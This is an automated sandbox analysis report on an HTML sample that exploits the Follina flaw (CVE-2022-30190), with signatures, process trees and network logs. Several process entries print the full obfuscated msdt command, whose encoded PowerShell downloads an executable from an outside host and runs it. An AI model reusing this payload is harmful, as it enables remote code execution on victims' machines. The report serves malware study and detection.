Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1024203777.test.html

Overview

General Information

Sample Name:1024203777.test.html
Analysis ID:696527
MD5:c389f7ee1d9e6376b7d96e80d7a1ffe1
SHA1:2d0b931cf7cecddddb35457a5719353840f8ca66
SHA256:8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da
Tags:CVE-2022-30190Exploithtml
Infos:

Detection

Follina CVE-2022-30190
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 2040 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5872 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • msdt.exe (PID: 5908 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • chrome.exe (PID: 6352 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.752386452.000001ACCA230000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    00000005.00000002.752780775.000001ACCA414000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      00000005.00000002.752409701.000001ACCA239000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1024203777.test.htmlVirustotal: Detection: 10%Perma Link

        Exploits

        barindex
        Source: Yara matchFile source: 00000005.00000002.752386452.000001ACCA230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.752780775.000001ACCA414000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.752409701.000001ACCA239000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
        Source: unknownDNS traffic detected: queries for: clients2.google.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
        Source: 1024203777.test.htmlVirustotal: Detection: 10%
        Source: C:\Windows\System32\msdt.exeFile created: C:\Users\user\AppData\Local\Temp\msdtadminJump to behavior
        Source: C:\Windows\System32\msdt.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: classification engineClassification label: mal56.expl.winHTML@38/0@6/6
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\1024203777.test.html
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1700,i,9923033970500120582,12250861549093349672,131072 /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/ID%20PCwdIAGnOSTic%20-skiP%20fOrce%20-PAraM%20%22It_rEbrOwsEForFILE=#7qnxE3%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=Aq$(iEX($(iEX('[SysTEm.TEXt.eNcOdinG]'+[chAr]58+[cHAr]58+'utF8.getstrING([sysTem.coNverT]'+[CHaR]0X3a+[ChAr]0X3A+'FRomBasE64sTrIng('+[cHAR]34+'c1RvUC1wck9jRXNzIC1mb3JDRSAtbmFNRSAnbXNkdCc7JEsgPSBhRGQtdFlwZSAtTUVtQmVSZGVGaU5JdGlPTiAnW0RsbEltcG9ydCgidVJsbW9OLkRMbCIsIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgZnFtLHN0cmluZyBELHN0cmluZyBFTyx1aW50IHVsLEludFB0ciB0KTsnIC1uYW1FICJ6IiAtbkFtRVNQYWNFIE0gLVBhc3NUaHJ1OyAkSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly9ldmVudG9yZ2FuaXplci5way9uZXdiaXRoZXJlMjAwNTRyZmRzLmV4ZSIsIiRFTlY6QVBQREFUQVxBbnlOYW1lLmV4ZSIsMCwwKTtzdEFSdC1TbEVFcCgzKTtyVU5EbGwzMi5leEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkZU5WOkFQUERBVEFcQW55TmFtZS5leGUiO1NUT3AtUFJvQ2VzUyAtZk9yQ0UgLW5hTUUgJ3NkaWFnbmhvc3Qn'+[chAR]0x22+'))'))))Y/../../../../../../../../../../../.EXE%20%22Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeAutomated click: Next
        Source: C:\Windows\System32\msdt.exeFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
        Source: C:\Windows\System32\msdt.exeWindow / User API: threadDelayed 2612Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#7qnxe3%20it_launchmethod=contextmenu%20it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe%20%22
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\msdt.exe "c:\windows\system32\msdt.exe" ms-msdt:/id%20pcwdiagnostic%20-skip%20force%20-param%20%22it_rebrowseforfile=#7qnxe3%20it_launchmethod=contextmenu%20it_browseforfile=aq$(iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]34+'c1rvuc1wck9jrxnzic1mb3jdrsatbmfnrsanbxnkdcc7jesgpsbhrgqtdflwzsattuvtqmvszgvgau5jdglptianw0rsbeltcg9ydcgidvjsbw9olkrmbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigznftlhn0cmluzybelhn0cmluzybftyx1aw50ihvsleludfb0cib0ktsnic1uyw1ficj6iiatbkftrvnqywnfie0glvbhc3nuahj1oyakszo6vvjmrg93bmxvywrub0zpbguomcwiahr0chm6ly9ldmvudg9yz2fuaxplci5way9uzxdiaxrozxjlmjawntryzmrzlmv4zsisiirftly6qvbqrefuqvxbbnloyw1llmv4zsismcwwkttzdefsdc1tbevfccgzkttyvu5ebgwzmi5leeugemlwzmxkci5kbgwsum91dgvuagvdywxsicikzu5wokfquerbvefcqw55tmftzs5leguio1nut3atufjvq2vzuyatzk9yq0uglw5htuugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))y/../../../../../../../../../../../.exe%20%22Jump to behavior
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        Path Interception1
        Process Injection
        2
        Masquerading
        OS Credential Dumping1
        Application Window Discovery
        Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS Memory1
        System Information Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
        Non-Application Layer Protocol
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
        Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
        Ingress Tool Transfer
        SIM Card SwapCarrier Billing Fraud
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        1024203777.test.html5%ReversingLabs
        1024203777.test.html10%VirustotalBrowse
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        accounts.google.com
        216.58.215.237
        truefalse
          high
          www.google.com
          172.217.168.36
          truefalse
            high
            clients.l.google.com
            172.217.168.78
            truefalse
              high
              clients2.google.com
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                  high
                  https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    172.217.168.78
                    clients.l.google.comUnited States
                    15169GOOGLEUSfalse
                    172.217.168.36
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    239.255.255.250
                    unknownReserved
                    unknownunknownfalse
                    216.58.215.237
                    accounts.google.comUnited States
                    15169GOOGLEUSfalse
                    IP
                    192.168.2.1
                    127.0.0.1
                    Joe Sandbox Version:35.0.0 Citrine
                    Analysis ID:696527
                    Start date and time:2022-09-02 13:43:41 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 36s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:1024203777.test.html
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Run name:Without Instrumentation
                    Number of analysed new started processes analysed:21
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal56.expl.winHTML@38/0@6/6
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .html
                    • Adjust boot time
                    • Enable AMSI
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 142.250.203.106, 172.217.168.67
                    • Excluded domains from analysis (whitelisted): eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r3---sn-4g5edn6k.gvt1.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, r3---sn-4g5edndz.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtWriteVirtualMemory calls found.
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    239.255.255.250Ch-Comptes311 (2) (9).docxGet hashmaliciousBrowse
                      Ch-Comptes311 (2) (9).docxGet hashmaliciousBrowse
                        https://lpfhd-cmpzourl.maillist-manage.com/click.zc?m=1&mrd=1d79b6a1a2a07b1e&od=3z8b377741191d94fe97771047891c97a8e8153f971f4ac9ea9d47382d7a9b539b&linkDgs=1d79b6a1a28d0810&repDgs=1d79b6a1a2b10d7eGet hashmaliciousBrowse
                          https://cloud.allynpachacusco.com/xdojGet hashmaliciousBrowse
                            https://lpfhd-cmpzourl.maillist-manage.com/click.zc?m=1&mrd=1d79b6a1a2a07b1e&od=3z8b377741191d94fe97771047891c97a8e8153f971f4ac9ea9d47382d7a9b539b&linkDgs=1d79b6a1a28d0810&repDgs=1d79b6a1a2b00b96Get hashmaliciousBrowse
                              factura de compra.htmGet hashmaliciousBrowse
                                http://www.merge-now.orgGet hashmaliciousBrowse
                                  56699_VM.htmGet hashmaliciousBrowse
                                    http://sze5i.3xrvm.rekaangkaaksara.co.id.///?QQQ#.bWF4aW5lLmdhcmRuZXJAaXR2LmNvbQ==Get hashmaliciousBrowse
                                      http://swuily-throass-fruarry.yolasite.comGet hashmaliciousBrowse
                                        http://nhs.whereby.comGet hashmaliciousBrowse
                                          https://nhs.whereby.com/Get hashmaliciousBrowse
                                            https://zordoo-my.sharepoint.com/:o:/g/personal/vedran_hasanovic_ecspower_hr/Ev0W6OyD2BBMhYamp2oNJCABgpDt4UN1mfGVLq9TVcw01g?e=5lyIXiGet hashmaliciousBrowse
                                              https://www.rmwilliams.com.se/Get hashmaliciousBrowse
                                                https://trakkitny-my.sharepoint.com/:f:/g/personal/stevez_trak-kit_com/Eo-vm22-6fRChWQEySso5EwBV5tJfd4yIT4F2-Clr_dYvA?e=zVvbjxGet hashmaliciousBrowse
                                                  https://trakkitny-my.sharepoint.com/:f:/g/personal/stevez_trak-kit_com/Eo-vm22-6fRChWQEySso5EwBV5tJfd4yIT4F2-Clr_dYvA?e=zVvbjxGet hashmaliciousBrowse
                                                    Benefit.htmlGet hashmaliciousBrowse
                                                      Benefit.htmlGet hashmaliciousBrowse
                                                        https://blueteamlabs.online/storage/files/43eecf22e8f914d44df3da16c23dcc2e076a8753.zipGet hashmaliciousBrowse
                                                          No context
                                                          No context
                                                          No context
                                                          No context
                                                          No created / dropped files found
                                                          File type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                          Entropy (8bit):6.048046902595105
                                                          TrID:
                                                            File name:1024203777.test.html
                                                            File size:19364
                                                            MD5:c389f7ee1d9e6376b7d96e80d7a1ffe1
                                                            SHA1:2d0b931cf7cecddddb35457a5719353840f8ca66
                                                            SHA256:8a01945c5951b6685768c155d938e7805b097477fcbb7e815fcb1cc26f1170da
                                                            SHA512:7de15cf2ed560a6ff7e7fd5d3c8b0e4f13ca585bab09d40e89785fc12f5b4c79d9f4cec4034b3f40f4ca54abab100e27947867558dbc7876366a8b614eea0ffc
                                                            SSDEEP:384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW
                                                            TLSH:C092C0E9EECC15EB09D1E230F66438DC05A60D4B117A21914CAF3EAD8FCD7535C1A6B1
                                                            File Content Preview:<!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....//Av9GwVvZPFcw55h7Xvq6eiNw33wn1kLMMtgKlxmHJLqlB0FbkSpSlv6hvs5Ufe225SgFJXZWudirllX811uiLxdKVr103bqaPWQ95c1wD2XMLlKNOYO4wCjRot3Xh0ZhLzCEddyBHRaRSPP0txXf55CjstRCAGx0umIcUyAv7l9Ed7ZeY6ddIzo
                                                            Icon Hash:78d0a8cccc88c460
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Sep 2, 2022 13:44:45.298142910 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:45.298190117 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:45.298266888 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:45.298594952 CEST49737443192.168.2.4216.58.215.237
                                                            Sep 2, 2022 13:44:45.298614979 CEST44349737216.58.215.237192.168.2.4
                                                            Sep 2, 2022 13:44:45.302855968 CEST49738443192.168.2.4172.217.168.78
                                                            Sep 2, 2022 13:44:45.302901983 CEST44349738172.217.168.78192.168.2.4
                                                            Sep 2, 2022 13:44:45.303025961 CEST49738443192.168.2.4172.217.168.78
